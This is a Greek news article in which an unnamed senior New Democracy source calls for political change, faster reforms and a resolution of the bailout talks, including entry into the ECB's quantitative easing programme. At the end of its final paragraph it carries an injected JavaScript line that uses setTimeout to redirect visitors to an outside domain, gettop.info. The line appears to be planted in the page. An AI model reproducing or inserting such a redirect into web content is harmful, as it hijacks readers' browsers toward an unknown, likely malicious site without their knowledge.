ΝΔ: Επιμένουμε στην πολιτική αλλαγή, η οικονομία χρειάζεται επανεκκίνηση

0
5

 

«Η ΝΔ επιμένει στην πολιτική αλλαγή και λόγω της αναντιστοιχίας της κοινοβουλευτικής πλειοψηφίας με το εκλογικό σώμα, αλλά και γιατί η ελληνική κοινωνία και οικονομία χρειάζεται restart» τόνιζε ανώτερη πηγή της ΝΔ την οποία επικαλείται το Αθηναϊκό Πρακτορείο, και προσέθετε ότι «απαιτείται πιο τολμηρή προσέγγιση στις μεταρρυθμίσεις και σε αλλά θέματα, όπως των τραπεζών».

«Μας ανησυχεί ότι η κυβέρνηση κινείται μεν προς την σωστή κατεύθυνση, αλλά με αργά βήματα» εξηγούσε η ίδια πηγή, ενώ ανησυχία εξέφρασε και για το γεγονός ότι πληθαίνουν οι διεθνείς αναλύσεις για το ενδεχόμενο ενός τέταρτου μνημονίου. Σημείωσε ακόμη ότι δεν είναι αισιόδοξος για την εν εξελίξει διαπραγμάτευση της κυβέρνησης με τους θεσμούς και εκτίμησε ότι «η κυβέρνηση θα χάσει και αυτήν την προσθεσμία της 5ης Δεκεμβρίου».

Ανέφερε πάντως ότι η ΝΔ θεωρεί απαραίτητη προϋπόθεση την ολοκλήρωση της διαπραγμάτευσης και την ένταξη της χώρας στο πρόγραμμα ποσοτικής χαλάρωσης της ΕΚΤ, για να μπορέσει στην συνέχεια να δανείζεται από τις αγορές σαν κανονική χώρα.

Είπε ακόμη ότι παρακολουθεί τις συζητήσεις με τους δανειστές και σε άλλα θέματα, όπως αυτό της Παιδείας, και ότι περιμένει να δει αν θα υπάρξουν αλλαγές σε κρίσιμους τομείς που και ο πρόεδρος της ΝΔ είχε επισημάνει κατά την προ ημερησίας διατάξεως συζήτηση στην Βουλή. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here